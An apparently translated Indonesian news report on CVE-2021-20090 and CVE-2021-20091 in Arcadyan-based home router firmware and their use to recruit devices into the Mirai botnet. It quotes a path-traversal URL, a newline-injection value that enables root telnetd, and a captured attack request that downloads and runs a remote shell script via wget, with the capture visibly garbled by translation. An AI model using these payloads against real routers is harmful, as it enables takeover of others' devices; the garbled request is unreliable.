Serangan besar-besaran telah tercatat di jaringan terhadap router rumah yang firmwarenya menggunakan implementasi server HTTP dari perusahaan Arcadyan. Untuk mendapatkan kendali atas perangkat, kombinasi dua kerentanan digunakan yang memungkinkan eksekusi kode arbitrer jarak jauh dengan hak root. Masalah ini mempengaruhi berbagai macam router ADSL dari Arcadyan, ASUS dan Buffalo, serta perangkat yang dipasok dengan merek Beeline (masalah dikonfirmasi di Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone dan operator telekomunikasi lainnya. Tercatat, masalah tersebut telah terjadi pada firmware Arcadyan selama lebih dari 10 tahun dan selama ini telah berhasil bermigrasi ke setidaknya 20 model perangkat dari 17 produsen berbeda.
Kerentanan pertama, CVE-2021-20090, memungkinkan untuk mengakses skrip antarmuka web apa pun tanpa otentikasi. Inti dari kerentanan ini adalah bahwa di antarmuka web, beberapa direktori tempat pengiriman gambar, file CSS, dan skrip JavaScript dapat diakses tanpa otentikasi. Dalam hal ini, direktori yang aksesnya diperbolehkan tanpa otentikasi diperiksa menggunakan topeng awal. Menentukan karakter β../β di jalur untuk menuju ke direktori induk diblokir oleh firmware, tetapi penggunaan kombinasi β..%2fβ dilewati. Dengan demikian, dimungkinkan untuk membuka halaman yang dilindungi saat mengirim permintaan seperti βhttp://192.168.1.1/images/..%2findex.htmβ.
Kerentanan kedua, CVE-2021-20091, memungkinkan pengguna yang diautentikasi untuk membuat perubahan pada pengaturan sistem perangkat dengan mengirimkan parameter yang diformat khusus ke skrip apply_abstract.cgi, yang tidak memeriksa keberadaan karakter baris baru di parameter . Misalnya, saat melakukan operasi ping, penyerang dapat menentukan nilai β192.168.1.2%0AARC_SYS_TelnetdEnable=1β di kolom dengan alamat IP yang sedang diperiksa, dan skrip, saat membuat file pengaturan /tmp/etc/config/ .glbcfg, akan menulis baris βAARC_SYS_TelnetdEnable=1β ke dalamnya ", yang mengaktifkan server telnetd, yang menyediakan akses shell perintah tidak terbatas dengan hak root. Demikian pula, dengan menyetel parameter AARC_SYS, Anda dapat mengeksekusi kode apa pun di sistem. Kerentanan pertama memungkinkan untuk menjalankan skrip yang bermasalah tanpa otentikasi dengan mengaksesnya sebagai β/images/..%2fapply_abstract.cgiβ.
Untuk mengeksploitasi kerentanan, penyerang harus dapat mengirim permintaan ke port jaringan tempat antarmuka web berjalan. Dilihat dari dinamika penyebaran serangan, banyak operator meninggalkan akses pada perangkat mereka dari jaringan eksternal untuk menyederhanakan diagnosis masalah oleh layanan dukungan. Jika akses ke antarmuka dibatasi hanya pada jaringan internal, serangan dapat dilakukan dari jaringan eksternal menggunakan teknik βDNS rebindingβ. Kerentanan sudah digunakan secara aktif untuk menghubungkan router ke botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Koneksi: tutup Agen-Pengguna: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Sumber: opennet.ru